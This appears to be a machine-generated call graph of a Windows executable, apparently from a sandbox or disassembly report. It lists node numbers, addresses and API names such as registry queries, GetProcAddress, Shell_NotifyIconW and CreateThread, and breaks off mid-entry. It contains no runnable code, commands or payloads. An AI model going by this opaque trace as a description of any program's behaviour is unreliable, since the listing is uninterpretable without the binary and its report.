92939->92944 92941 5656c1 92941->92901 92942->92903 92943->92906 92944->92941 92945 58e6dd 92946 58e68a 92945->92946 92948 59e753 SHGetFolderPathW 92946->92948 92951 5384b7 92948->92951 92950 59e780 92950->92946 92952 5384c7 _wcslen 92951->92952 92953 5765bb 92951->92953 92956 538502 92952->92956 92957 5384dd 92952->92957 92982 5396d9 92953->92982 92955 5765c4 92955->92955 92964 55016b 92956->92964 92963 538894 8 API calls 92957->92963 92960 5384e5 __fread_nolock 92960->92950 92961 53850e 92973 55019b 92961->92973 92963->92960 92965 550170 ___std_exception_copy 92964->92965 92966 55018a 92965->92966 92969 55018c 92965->92969 92986 55523d 7 API calls 2 library calls 92965->92986 92966->92961 92968 5509fd 92988 553634 RaiseException 92968->92988 92969->92968 92987 553634 RaiseException 92969->92987 92972 550a1a 92972->92961 92974 55016b ___std_exception_copy 92973->92974 92975 55018a 92974->92975 92978 55018c 92974->92978 92989 55523d 7 API calls 2 library calls 92974->92989 92975->92960 92977 5509fd 92991 553634 RaiseException 92977->92991 92978->92977 92990 553634 RaiseException 92978->92990 92981 550a1a 92981->92960 92983 5396e7 92982->92983 92985 5396f0 __fread_nolock 92982->92985 92983->92985 92992 53c269 92983->92992 92985->92955 92986->92965 92987->92968 92988->92972 92989->92974 92990->92977 92991->92981 92993 53c279 __fread_nolock 92992->92993 92994 53c27c 92992->92994 92993->92985 92995 55016b 8 API calls 92994->92995 92996 53c287 92995->92996 92997 55019b 8 API calls 92996->92997 92997->92993 95747 54f9b1 95748 54f9bb 95747->95748 95753 54f9dc 95747->95753 95756 53c34b 95748->95756 95750 54f9cb 95752 53c34b 8 API calls 95750->95752 95754 54f9db 95752->95754 95755 58fadc 95753->95755 95764 5955d9 8 API calls messages 95753->95764 95757 53c359 95756->95757 95762 53c381 messages 95756->95762 95758 53c367 95757->95758 95760 53c34b 8 API calls 95757->95760 95759 53c36d 95758->95759 95761 53c34b 8 API calls 95758->95761 95759->95762 95763 53c780 8 API calls 95759->95763 95760->95758 95761->95759 95762->95750 95763->95762 95764->95753 92998 58e71e 92999 58e747 92998->92999 93000 58e737 GetProcAddress 92998->93000 93001 58e610 92999->93001 93002 58e762 FreeLibrary 92999->93002 93000->92999 93002->93001 93003 53105b 93008 53522e 93003->93008 93005 53106a 93039 550433 29 API calls __onexit 93005->93039 93007 531074 93009 53523e __wsopen_s 93008->93009 93040 53bf07 93009->93040 93013 5352fd 93052 5351bf 93013->93052 93020 53bf07 8 API calls 93021 53532e 93020->93021 93073 53bceb 93021->93073 93024 574bc0 RegQueryValueExW 93025 574c56 RegCloseKey 93024->93025 93026 574bdd 93024->93026 93029 535359 93025->93029 93038 574c68 _wcslen 93025->93038 93027 55019b 8 API calls 93026->93027 93028 574bf6 93027->93028 93079 5341a6 93028->93079 93029->93005 93032 53627c 8 API calls 93032->93038 93033 574c1e 93034 5384b7 8 API calls 93033->93034 93035 574c38 messages 93034->93035 93035->93025 93037 53684e 8 API calls 93037->93038 93038->93029 93038->93032 93038->93037 93082 53b25f 93038->93082 93039->93007 93041 55019b 8 API calls 93040->93041 93042 53bf1c 93041->93042 93043 55016b 8 API calls 93042->93043 93044 5352f4 93043->93044 93045 53551b 93044->93045 93088 5722f0 93045->93088 93048 53b25f 8 API calls 93049 53554e 93048->93049 93090 53557e 93049->93090 93051 535558 93051->93013 93053 5722f0 __wsopen_s 93052->93053 93054 5351cc GetFullPathNameW 93053->93054 93055 5351ee 93054->93055 93056 5384b7 8 API calls 93055->93056 93057 53520c 93056->93057 93058 5365a4 93057->93058 93059 5365bb 93058->93059 93060 575629 93058->93060 93104 5365cc 93059->93104 93062 55016b 8 API calls 93060->93062 93064 575633 _wcslen 93062->93064 93063 535316 93067 53684e 93063->93067 93065 55019b 8 API calls 93064->93065 93066 57566c __fread_nolock 93065->93066 93068 53685d 93067->93068 93072 53687e __fread_nolock 93067->93072 93070 55019b 8 API calls 93068->93070 93069 55016b 8 API calls 93071 535325 93069->93071 93070->93072 93071->93020 93072->93069 93074 53bd05 93073->93074 93075 535337 RegOpenKeyExW 93073->93075 93076 55016b 8 API calls 93074->93076 93075->93024 93075->93029 93077 53bd0f 93076->93077 93078 55019b 8 API calls 93077->93078 93078->93075 93080 55016b 8 API calls 93079->93080 93081 5341b8 RegQueryValueExW 93080->93081 93081->93033 93081->93035 93083 53b26e _wcslen 93082->93083 93084 55019b 8 API calls 93083->93084 93085 53b296 __fread_nolock 93084->93085 93086 55016b 8 API calls 93085->93086 93087 53b2ac 93086->93087 93087->93038 93089 535528 GetModuleFileNameW 93088->93089 93089->93048 93091 5722f0 __wsopen_s 93090->93091 93092 53558b GetFullPathNameW 93091->93092 93093 5355c5 93092->93093 93094 5355aa 93092->93094 93096 53bceb 8 API calls 93093->93096 93095 5384b7 8 API calls 93094->93095 93097 5355b6 93095->93097 93096->93097 93100 5379ed 93097->93100 93101 5379fb 93100->93101 93102 5396d9 8 API calls 93101->93102 93103 5355c2 93102->93103 93103->93051 93105 5365dc _wcslen 93104->93105 93106 57568b 93105->93106 93107 5365ef 93105->93107 93109 55016b 8 API calls 93106->93109 93114 537cb3 93107->93114 93110 575695 93109->93110 93112 55019b 8 API calls 93110->93112 93111 5365fc __fread_nolock 93111->93063 93113 5756c5 __fread_nolock 93112->93113 93115 537cc9 93114->93115 93118 537cc4 __fread_nolock 93114->93118 93116 55019b 8 API calls 93115->93116 93117 5764be 93115->93117 93116->93118 93117->93117 93118->93111 93119 531098 93124 535d78 93119->93124 93123 5310a7 93125 53bf07 8 API calls 93124->93125 93126 535d8f GetVersionExW 93125->93126 93127 5384b7 8 API calls 93126->93127 93128 535ddc 93127->93128 93129 5396d9 8 API calls 93128->93129 93139 535e12 93128->93139 93130 535e06 93129->93130 93132 5379ed 8 API calls 93130->93132 93131 535ecc GetCurrentProcess IsWow64Process 93133 535ee8 93131->93133 93132->93139 93134 535f00 LoadLibraryA 93133->93134 93135 5750f2 GetSystemInfo 93133->93135 93136 535f11 GetProcAddress 93134->93136 93137 535f4d GetSystemInfo 93134->93137 93136->93137 93141 535f21 GetNativeSystemInfo 93136->93141 93138 535f27 93137->93138 93142 53109d 93138->93142 93143 535f2b FreeLibrary 93138->93143 93139->93131 93140 5750ad 93139->93140 93141->93138 93144 550433 29 API calls __onexit 93142->93144 93143->93142 93144->93123 93145 586553 93146 55016b 8 API calls 93145->93146 93147 58655a 93146->93147 93151 59fa10 93147->93151 93149 586566 93150 59fa10 8 API calls 93149->93150 93150->93149 93152 59fa30 93151->93152 93153 59faf9 93152->93153 93154 55019b 8 API calls 93152->93154 93153->93149 93155 59fa6c 93154->93155 93157 59fa8e 93155->93157 93159 59fb02 8 API calls 93155->93159 93157->93153 93160 53be6d 93157->93160 93159->93155 93161 53be90 __fread_nolock 93160->93161 93162 53be81 93160->93162 93161->93157 93162->93161 93163 55019b 8 API calls 93162->93163 93163->93161 95765 5855f4 95774 54e34f 95765->95774 95767 58560a 95769 585685 95767->95769 95783 54a9e5 9 API calls 95767->95783 95773 58617b 95769->95773 95785 5a3ef6 81 API calls __wsopen_s 95769->95785 95771 585665 95771->95769 95784 5a2393 8 API calls 95771->95784 95775 54e370 95774->95775 95776 54e35d 95774->95776 95778 54e375 95775->95778 95779 54e3a3 95775->95779 95786 53b3fe 8 API calls 95776->95786 95781 55016b 8 API calls 95778->95781 95787 53b3fe 8 API calls 95779->95787 95782 54e367 95781->95782 95782->95767 95783->95771 95784->95769 95785->95773 95786->95782 95787->95782 95788 53367c 95791 533696 95788->95791 95792 5336ad 95791->95792 95793 5336b2 95792->95793 95794 533711 95792->95794 95831 53370f 95792->95831 95795 53378b PostQuitMessage 95793->95795 95796 5336bf 95793->95796 95798 533717 95794->95798 95799 573dce 95794->95799 95803 533690 95795->95803 95800 5336ca 95796->95800 95801 573e3b 95796->95801 95797 5336f6 DefWindowProcW 95797->95803 95804 533743 SetTimer RegisterWindowMessageW 95798->95804 95805 53371e 95798->95805 95847 532f24 10 API calls 95799->95847 95806 533795 95800->95806 95807 5336d4 95800->95807 95852 59c80c 65 API calls ___scrt_fastfail 95801->95852 95804->95803 95808 53376c CreatePopupMenu 95804->95808 95811 533727 KillTimer 95805->95811 95812 573d6f 95805->95812 95836 54fcbb 95806->95836 95814 573e20 95807->95814 95815 5336df 95807->95815 95808->95803 95810 573def 95848 54f1c6 40 API calls 95810->95848 95843 53388e Shell_NotifyIconW ___scrt_fastfail 95811->95843 95819 573d74 95812->95819 95820 573daa MoveWindow 95812->95820 95814->95797 95851 591367 8 API calls 95814->95851 95822 5336ea 95815->95822 95823 533779 95815->95823 95816 573e4d 95816->95797 95816->95803 95824 573d7a 95819->95824 95825 573d99 SetFocus 95819->95825 95820->95803 95821 53373a 95844 53572c DeleteObject DestroyWindow 95821->95844 95822->95797 95849 53388e Shell_NotifyIconW ___scrt_fastfail 95822->95849 95845 5337a6 75 API calls ___scrt_fastfail 95823->95845 95824->95822 95826 573d83 95824->95826 95825->95803 95846 532f24 10 API calls 95826->95846 95831->95797 95832 533789 95832->95803 95834 573e14 95850 5338f2 60 API calls ___scrt_fastfail 95834->95850 95837 54fcd3 ___scrt_fastfail 95836->95837 95838 54fd59 95836->95838 95853 535f59 95837->95853 95838->95803 95840 54fcfa 95841 54fd42 KillTimer SetTimer 95840->95841 95842 58fdcb Shell_NotifyIconW 95840->95842 95841->95838 95842->95841 95843->95821 95844->95803 95845->95832 95846->95803 95847->95810 95848->95822 95849->95834 95850->95831 95851->95831 95852->95816 95854 535f76 95853->95854 95872 536058 95853->95872 95855 537a14 8 API calls 95854->95855 95856 535f84 95855->95856 95857 535f91 95856->95857 95858 575101 LoadStringW 95856->95858 95859 5384b7 8 API calls 95857->95859 95861 57511b 95858->95861 95860 535fa6 95859->95860 95862 535fb3 95860->95862 95869 575137 95860->95869 95864 53be6d 8 API calls 95861->95864 95882 535fd9 ___scrt_fastfail 95861->95882 95862->95861 95863 535fbd 95862->95863 95865 5365a4 8 API calls 95863->95865 95864->95882 95866 535fcb 95865->95866 95867 537af4 8 API calls 95866->95867 95867->95882 95868 57517a 95884 54fe8f 51 API calls 95868->95884 95869->95868 95871 53bf07 8 API calls 95869->95871 95869->95882 95870 53603e Shell_NotifyIconW 95870->95872 95873 575161 95871->95873 95872->95840 95883 59a265 9 API calls 95873->95883 95876 57516c 95878 537af4 8 API calls 95876->95878 95877 575199 95879 5365a4 8 API calls 95877->95879 95878->95868 95880 5751aa 95879->95880 95881 5365a4 8 API calls 95880->95881 95881->95882 95882->95870 95883->95876 95884->95877 95885 581a68 95886 581a70 95885->95886 95889 53d4e5 95885->95889 95923 5979af 8 API calls __fread_nolock 95886->95923 95888 581a82 95924 597928 8 API calls __fread_nolock 95888->95924 95891 55016b 8 API calls 95889->95891 95893 53d539 95891->95893 95892 581aac 95894 5402f0 254 API calls 95892->95894 95915 53c2cd 95893->95915 95895 581ad3 95894->95895 95896 581ae7 95895->95896 95925 5b60a2 53 API calls _wcslen 95895->95925 95900 55016b 8 API calls 95906 53d61e messages 95900->95906 95901 581b04 95901->95889 95926 5979af 8 API calls __fread_nolock 95901->95926 95903 53d8c1 messages 95904 53c34b 8 API calls 95903->95904 95913 53d95c messages 95903->95913 95904->95913 95906->95903 95909 581f1c 95906->95909 95911 581f37 95906->95911 95912 53be6d 8 API calls 95906->95912 95914 53c34b 8 API calls 95906->95914 95927 53b3fe 8 API calls 95906->95927 95908 53d973 95928 5955d9 8 API calls messages 95909->95928 95912->95906 95913->95908 95922 54e284 8 API calls messages 95913->95922 95914->95906 95918 53c2dd 95915->95918 95916 53c2e5 95916->95900 95917 55016b 8 API calls 95917->95918 95918->95916 95918->95917 95919 53bf07 8 API calls 95918->95919 95920 53c2cd 8 API calls 95918->95920 95921 53be6d 8 API calls 95918->95921 95919->95918 95920->95918 95921->95918 95922->95913 95923->95888 95924->95892 95925->95901 95926->95901 95927->95906 95928->95911 95929 5727a2 95932 532a52 95929->95932 95933 532a91 mciSendStringW 95932->95933 95934 5739f4 DestroyWindow 95932->95934 95935 532d08 95933->95935 95936 532aad 95933->95936 95945 573a00 95934->95945 95935->95936 95938 532d17 UnregisterHotKey 95935->95938 95937 532abb 95936->95937 95936->95945 95964 532e70 95937->95964 95938->95935 95941 573a45 95946 573a69 95941->95946 95947 573a58 FreeLibrary 95941->95947 95942 573a1e FindClose 95942->95945 95943 537953 CloseHandle 95943->95945 95944 532ad0 95944->95946 95951 532ade 95944->95951 95945->95941 95945->95942 95945->95943 95948 573a7d VirtualFree 95946->95948 95953 532b4b 95946->95953 95947->95941 95948->95946 95949 532b3a CoUninitialize 95949->95953 95950 573ac5 95956 573ad4 messages 95950->95956 95970 5a3c45 6 API calls messages 95950->95970 95951->95949 95953->95950 95954 532b56 95953->95954 95968 532f86 VirtualFreeEx CloseHandle 95954->95968 95960 573b63 95956->95960 95971 596d63 8 API calls messages 95956->95971 95958 532b7c 95958->95956 95959 532c61 95958->95959 95959->95960 95961 532caf 95959->95961 95960->95960 95961->95960 95969 532eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 95961->95969 95963 532d03 95966 532e7d 95964->95966 95965 532ac2 95965->95941 95965->95944 95966->95965 95972 5978b9 8 API calls 95966->95972 95968->95958 95969->95963 95970->95950 95971->95956 95972->95966 95973 58506e 95984 53f7b0 messages 95973->95984 95975 541c50 8 API calls 95975->95984 95976 53bdc1 39 API calls 95976->95984 95977 53bf07 8 API calls 95977->95984 95978 53fa91 95980 53be6d 8 API calls 95980->95984 95983 5402f0 254 API calls 95983->95984 95984->95975 95984->95976 95984->95977 95984->95978 95984->95980 95984->95983 95987 5a3ef6 81 API calls 95984->95987 95988 54b2d6 254 API calls 95984->95988 95989 5505d2 5 API calls __Init_thread_wait 95984->95989 95990 550433 29 API calls __onexit 95984->95990 95991 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95984->95991 95992 5b5131 101 API calls 95984->95992 95993 5b721e 254 API calls 95984->95993 95987->95984 95988->95984 95989->95984 95990->95984 95991->95984 95992->95984 95993->95984 95994 583bae 96015 59c72e 95994->96015 95997 583bb8 95998 583be3 95997->95998 95999 59c72e Sleep 95997->95999 96005 53ef8b 95997->96005 96021 54a9e5 9 API calls 95997->96021 96000 53b25f 8 API calls 95998->96000 95999->95997 96001 583c13 96000->96001 96022 53bf39 39 API calls 96001->96022 96003 583c2f 96023 5a4384 8 API calls 96003->96023 96008 53f400 96005->96008 96007 53f047 96009 53f41f 96008->96009 96011 53f433 96008->96011 96024 53e910 96009->96024 96056 5a3ef6 81 API calls __wsopen_s 96011->96056 96012 53f42a 96012->96007 96014 584528 96014->96014 96016 59c754 96015->96016 96018 59c739 96015->96018 96017 59c782 96016->96017 96019 59c766 Sleep 96016->96019 96017->95997 96018->95997 96019->96017 96021->95997 96022->96003 96023->96007 96025 5402f0 254 API calls 96024->96025 96027 53e94d 96025->96027 96026 53e9bb messages 96026->96012 96027->96026 96028 53ed85 96027->96028 96030 53ea73 96027->96030 96036 53eb68 96027->96036 96041 583176 96027->96041 96045 55016b 8 API calls 96027->96045 96051 53ead9 __fread_nolock messages 96027->96051 96028->96026 96037 55019b 8 API calls 96028->96037 96030->96028 96032 53ea7e 96030->96032 96031 53ecaf 96034 53ecc4 96031->96034 96035 583167 96031->96035 96033 55016b 8 API calls 96032->96033 96044 53ea85 __fread_nolock 96033->96044 96038 55016b 8 API calls 96034->96038 96062 5b6062 8 API calls 96035->96062 96040 55019b 8 API calls 96036->96040 96037->96044 96048 53eb1a 96038->96048 96040->96051 96063 5a3ef6 81 API calls __wsopen_s 96041->96063 96042 55016b 8 API calls 96043 53eaa6 96042->96043 96043->96051 96057 53d210 254 API calls 96043->96057 96044->96042 96044->96043 96045->96027 96047 583156 96061 5a3ef6 81 API calls __wsopen_s 96047->96061 96048->96012 96051->96031 96051->96047 96051->96048 96052 583131 96051->96052 96054 58310f 96051->96054 96058 534485 254 API calls 96051->96058 96060 5a3ef6 81 API calls __wsopen_s 96052->96060 96059 5a3ef6 81 API calls __wsopen_s 96054->96059 96056->96014 96057->96051 96058->96051 96059->96048 96060->96048 96061->96048 96062->96041 96063->96026 93164 531044 93169 532735 93164->93169 93166 53104a 93205 550433 29 API calls __onexit 93166->93205 93168 531054 93206 5329da 93169->93206 93173 5327ac 93174 53bf07 8 API calls 93173->93174 93175 5327b6 93174->93175 93176 53bf07 8 API calls 93175->93176 93177 5327c0 93176->93177 93178 53bf07 8 API calls 93177->93178 93179 5327ca 93178->93179 93180 53bf07 8 API calls 93179->93180 93181 532808 93180->93181 93182 53bf07 8 API calls 93181->93182 93183 5328d4 93182->93183 93216 532d5e 93183->93216 93187 532906 93188 53bf07 8 API calls 93187->93188 93189 532910 93188->93189 93237 5430e0 93189->93237 93191 53293b 93247 5330ed 93191->93247 93193 532957 93194 532967 GetStdHandle 93193->93194 93195 5739c1 93194->93195 93196 5329bc 93194->93196 93195->93196 93197 5739ca 93195->93197 93199 5329c9 OleInitialize 93196->93199 93198 55016b 8 API calls 93197->93198 93200 5739d1 93198->93200 93199->93166 93254 5a09d9 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 93200->93254 93202 5739da 93255 5a1200 CreateThread 93202->93255 93204 5739e6 CloseHandle 93204->93196 93205->93168 93256 532a33 93206->93256 93209 532a33 8 API calls 93210 532a12 93209->93210 93211 53bf07 8 API calls 93210->93211 93212 532a1e 93211->93212 93213 5384b7 8 API calls 93212->93213 93214 53276b 93213->93214 93215 533205 6 API calls 93214->93215 93215->93173 93217 53bf07 8 API calls 93216->93217 93218 532d6e 93217->93218 93219 53bf07 8 API calls 93218->93219 93220 532d76 93219->93220 93221 53bf07 8 API calls 93220->93221 93222 532d91 93221->93222 93223 55016b 8 API calls 93222->93223 93224 5328de 93223->93224 93225 53318c 93224->93225 93226 53319a 93225->93226 93227 53bf07 8 API calls 93226->93227 93228 5331a5 93227->93228 93229 53bf07 8 API calls 93228->93229 93230 5331b0 93229->93230 93231 53bf07 8 API calls 93230->93231 93232 5331bb 93231->93232 93233 53bf07 8 API calls 93232->93233 93234 5331c6 93233->93234 93235 55016b 8 API calls 93234->93235 93236 5331d8 RegisterWindowMessageW 93235->93236 93236->93187 93238 543121 93237->93238 93239 5430fd 93237->93239 93263 5505d2 5 API calls __Init_thread_wait 93238->93263 93246 54310e 93239->93246 93265 5505d2 5 API calls __Init_thread_wait 93239->93265 93242 54312b 93242->93239 93264 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93242->93264 93243 549ec7 93243->93246 93266 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93243->93266 93246->93191 93248 573c69 93247->93248 93249 5330fd 93247->93249 93267 5a3b63 8 API calls 93248->93267 93250 55016b 8 API calls 93249->93250 93253 533105 93250->93253 93252 573c74 93253->93193 93254->93202 93255->93204 93268 5a11e6 14 API calls 93255->93268 93257 53bf07 8 API calls 93256->93257 93258 532a3e 93257->93258 93259 53bf07 8 API calls 93258->93259 93260 532a46 93259->93260 93261 53bf07 8 API calls 93260->93261 93262 532a08 93261->93262 93262->93209 93263->93242 93264->93239 93265->93243 93266->93246 93267->93252 93269 55f08e 93270 55f09a ___scrt_is_nonwritable_in_current_image 93269->93270 93271 55f0a6 93270->93271 93272 55f0bb 93270->93272 93288 55f669 20 API calls __dosmaperr 93271->93288 93282 55951d EnterCriticalSection 93272->93282 93275 55f0ab 93289 562b7c 26 API calls __cftof 93275->93289 93276 55f0c7 93283 55f0fb 93276->93283 93281 55f0b6 __wsopen_s 93282->93276 93291 55f126 93283->93291 93285 55f108 93286 55f0d4 93285->93286 93311 55f669 20 API calls __dosmaperr 93285->93311 93290 55f0f1 LeaveCriticalSection __fread_nolock 93286->93290 93288->93275 93289->93281 93290->93281 93292 55f134 93291->93292 93293 55f14e 93291->93293 93315 55f669 20 API calls __dosmaperr 93292->93315 93295 55dce5 __fread_nolock 26 API calls 93293->93295 93296 55f157 93295->93296 93312 569799 93296->93312 93297 55f139 93316 562b7c 26 API calls __cftof 93297->93316 93300 55f144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 93300->93285 93302 55f1df 93305 55f20e 93302->93305 93307 55f1fc 93302->93307 93303 55f25b 93304 55f268 93303->93304 93303->93305 93318 55f669 20 API calls __dosmaperr 93304->93318 93305->93300 93319 55f2bb 30 API calls 2 library calls 93305->93319 93317 55f43f 31 API calls 4 library calls 93307->93317 93309 55f206 93309->93300 93311->93286 93320 569616 93312->93320 93314 55f173 93314->93300 93314->93302 93314->93303 93315->93297 93316->93300 93317->93309 93318->93300 93319->93300 93321 569622 ___scrt_is_nonwritable_in_current_image 93320->93321 93322 569642 93321->93322 93323 56962a 93321->93323 93325 5696f6 93322->93325 93330 56967a 93322->93330 93355 55f656 20 API calls __dosmaperr 93323->93355 93360 55f656 20 API calls __dosmaperr 93325->93360 93326 56962f 93356 55f669 20 API calls __dosmaperr 93326->93356 93329 5696fb 93361 55f669 20 API calls __dosmaperr 93329->93361 93345 5654d7 EnterCriticalSection 93330->93345 93333 569703 93362 562b7c 26 API calls __cftof 93333->93362 93334 569680 93336 5696a4 93334->93336 93337 5696b9 93334->93337 93357 55f669 20 API calls __dosmaperr 93336->93357 93346 56971b 93337->93346 93339 569637 __wsopen_s 93339->93314 93341 5696a9 93358 55f656 20 API calls __dosmaperr 93341->93358 93342 5696b4 93359 5696ee LeaveCriticalSection __wsopen_s 93342->93359 93345->93334 93347 565754 __wsopen_s 26 API calls 93346->93347 93348 56972d 93347->93348 93349 569746 SetFilePointerEx 93348->93349 93350 569735 93348->93350 93351 56975e GetLastError 93349->93351 93352 56973a 93349->93352 93363 55f669 20 API calls __dosmaperr 93350->93363 93364 55f633 20 API calls __dosmaperr 93351->93364 93352->93342 93355->93326 93356->93339 93357->93341 93358->93342 93359->93339 93360->93329 93361->93333 93362->93339 93363->93352 93364->93352 96064 540e6f 96065 540e83 96064->96065 96071 5413d5 96064->96071 96066 540e95 96065->96066 96069 55016b 8 API calls 96065->96069 96067 5855d0 96066->96067 96070 540eee 96066->96070 96098 53b3fe 8 API calls 96066->96098 96099 5a1a29 8 API calls 96067->96099 96069->96066 96072 542ad0 254 API calls 96070->96072 96089 54044d messages 96070->96089 96071->96066 96074 53be6d 8 API calls 96071->96074 96095 540326 messages 96072->96095 96074->96066 96075 5862cf 96103 5a3ef6 81 API calls __wsopen_s 96075->96103 96076 541645 96083 53be6d 8 API calls 96076->96083 96076->96089 96078 55016b 8 API calls 96078->96095 96080 585c7f 96087 53be6d 8 API calls 96080->96087 96080->96089 96081 5861fe 96102 5a3ef6 81 API calls __wsopen_s 96081->96102 96082 53be6d 8 API calls 96082->96095 96083->96089 96086 541940 254 API calls 96086->96095 96087->96089 96088 53bf07 8 API calls 96088->96095 96090 550433 29 API calls pre_c_initialization 96090->96095 96091 5505d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96091->96095 96092 5860b9 96100 5a3ef6 81 API calls __wsopen_s 96092->96100 96093 540a5e messages 96101 5a3ef6 81 API calls __wsopen_s 96093->96101 96095->96075 96095->96076 96095->96078 96095->96080 96095->96081 96095->96082 96095->96086 96095->96088 96095->96089 96095->96090 96095->96091 96095->96092 96095->96093 96096 550588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96095->96096 96097 541e00 40 API calls messages 96095->96097 96096->96095 96097->96095 96098->96066 96099->96089 96100->96093 96101->96089 96102->96089 96103->96089 96104 5415af 96105 54e34f 8 API calls 96104->96105 96106 5415c5 96105->96106 96111 54e3b3 96106->96111 96108 5415ef 96109 5861ab 96108->96109 96123 5a3ef6 81 API calls __wsopen_s 96108->96123 96112 537a14 8 API calls 96111->96112 96113 54e3ea 96112->96113 96114 53b25f 8 API calls 96113->96114 96117 54e41b 96113->96117 96115 58e4e4 96114->96115 96116 537af4 8 API calls 96115->96116 96118 58e4ef 96116->96118 96117->96108 96124 54e73b 39 API calls 96118->96124 96120 58e502 96122 58e506 96120->96122 96125 53b3fe 8 API calls 96120->96125 96122->96122 96123->96109 96124->96120 96125->96122 93365 55078b 93366 550797 ___scrt_is_nonwritable_in_current_image 93365->93366 93395 550241 93366->93395 93368 5508f1 93436 550bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 93368->93436 93369 55079e 93369->93368 93372 5507c8 93369->93372 93371 5508f8 93429 5551e2 93371->93429 93383 550807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 93372->93383 93406 56280d 93372->93406 93379 5507e7 93381 550868 93414 550ce9 93381->93414 93383->93381 93432 5551aa 38 API calls 3 library calls 93383->93432 93384 55086e 93418 5332a2 93384->93418 93389 55088a 93389->93371 93390 55088e 93389->93390 93391 550897 93390->93391 93434 555185 28 API calls _abort 93390->93434 93435 5503d0 13 API calls 2 library calls 93391->93435 93394 55089f 93394->93379 93396 55024a 93395->93396 93438 550a28 IsProcessorFeaturePresent 93396->93438 93398 550256 93439 553024 10 API calls 3 library calls 93398->93439 93400 55025b 93405 55025f 93400->93405 93440 5626a7 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 93400->93440 93402 550276 93402->93369 93403 550268 93403->93402 93441 55304d 8 API calls 3 library calls 93403->93441 93405->93369 93409 562824 93406->93409 93408 5507e1 93408->93379 93410 5627b1 93408->93410 93442 550e1c 93409->93442 93413 5627e0 93410->93413 93411 550e1c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 93412 562809 93411->93412 93412->93383 93413->93411 93450 5526d0 93414->93450 93417 550d0f 93417->93384 93419 5332ae IsThemeActive 93418->93419 93420 533309 93418->93420 93452 5552d3 93419->93452 93433 550d22 GetModuleHandleW 93420->93433 93422 5332d9 93458 555339 93422->93458 93424 5332e0 93465 53326d SystemParametersInfoW SystemParametersInfoW 93424->93465 93426 5332e7 93466 533312 93426->93466 94453 554f5f 93429->94453 93432->93381 93433->93389 93434->93391 93435->93394 93436->93371 93438->93398 93439->93400 93440->93403 93441->93405 93443 550e25 93442->93443 93444 550e27 IsProcessorFeaturePresent 93442->93444 93443->93408 93446 550fee 93444->93446 93449 550fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 93446->93449 93448 5510d1 93448->93408 93449->93448 93451 550cfc GetStartupInfoW 93450->93451 93451->93417 93453 5552df ___scrt_is_nonwritable_in_current_image 93452->93453 93515 5632ee EnterCriticalSection 93453->93515 93455 5552ea pre_c_initialization 93516 55532a 93455->93516 93457 55531f __wsopen_s 93457->93422 93459 555345 93458->93459 93460 55535f 93458->93460 93459->93460 93520 55f669 20 API calls __dosmaperr 93459->93520 93460->93424 93462 55534f 93521 562b7c 26 API calls __cftof 93462->93521 93464 55535a 93464->93424 93465->93426 93467 533322 __wsopen_s 93466->93467 93468 53bf07 8 API calls 93467->93468 93469 53332e GetCurrentDirectoryW 93468->93469 93522 534f60 93469->93522 93515->93455 93519 563336 LeaveCriticalSection 93516->93519 93518 555331 93518->93457 93519->93518 93520->93462 93521->93464 93523 53bf07 8 API calls 93522->93523 93524 534f76 93523->93524 93646 5360f5 93524->93646 93526 534f94 93527 53bceb 8 API calls 93526->93527 93528 534fa8 93527->93528 93529 53be6d 8 API calls 93528->93529 93530 534fb3 93529->93530 93660 5388e8 93530->93660 93533 53b25f 8 API calls 93534 534fcc 93533->93534 93663 53bdc1 93534->93663 93536 534fdc 93537 53b25f 8 API calls 93536->93537 93538 535002 93537->93538 93539 53bdc1 39 API calls 93538->93539 93540 535011 93539->93540 93541 53bf07 8 API calls 93540->93541 93542 53502f 93541->93542 93667 535151 93542->93667 93546 535049 93547 535053 93546->93547 93548 574afd 93546->93548 93549 554db8 _strftime 40 API calls 93547->93549 93550 535151 8 API calls 93548->93550 93552 53505e 93549->93552 93551 574b11 93550->93551 93554 535151 8 API calls 93551->93554 93552->93551 93553 535068 93552->93553 93555 554db8 _strftime 40 API calls 93553->93555 93556 574b2d 93554->93556 93557 535073 93555->93557 93559 53551b 10 API calls 93556->93559 93557->93556 93647 536102 __wsopen_s 93646->93647 93648 5384b7 8 API calls 93647->93648 93649 536134 93647->93649 93648->93649 93657 53616a 93649->93657 93705 53627c 93649->93705 93651 53b25f 8 API calls 93652 536261 93651->93652 93654 53684e 8 API calls 93652->93654 93653 53b25f 8 API calls 93653->93657 93655 53626d 93654->93655 93655->93526 93656 53684e 8 API calls 93656->93657 93657->93653 93657->93656 93658 536238 93657->93658 93659 53627c 8 API calls 93657->93659 93658->93651 93658->93655 93659->93657 93661 55016b 8 API calls 93660->93661 93662 534fbf 93661->93662 93662->93533 93664 53bdcc 93663->93664 93665 53bdfb 93664->93665 93708 53bf39 39 API calls 93664->93708 93665->93536 93668 53515b 93667->93668 93669 535179 93667->93669 93670 53503b 93668->93670 93672 53be6d 8 API calls 93668->93672 93671 5384b7 8 API calls 93669->93671 93673 554db8 93670->93673 93671->93670 93672->93670 93674 554dc6 93673->93674 93675 554e3b 93673->93675 93682 554deb 93674->93682 93709 55f669 20 API calls __dosmaperr 93674->93709 93711 554e4d 40 API calls 4 library calls 93675->93711 93678 554e48 93678->93546 93679 554dd2 93710 562b7c 26 API calls __cftof 93679->93710 93681 554ddd 93681->93546 93682->93546 93706 53c269 8 API calls 93705->93706 93707 536287 93706->93707 93707->93649 93708->93665 93709->93679 93710->93681 93711->93678 94454 554f6b FindHandlerForForeignException 94453->94454 94455 554f84 94454->94455 94456 554f72 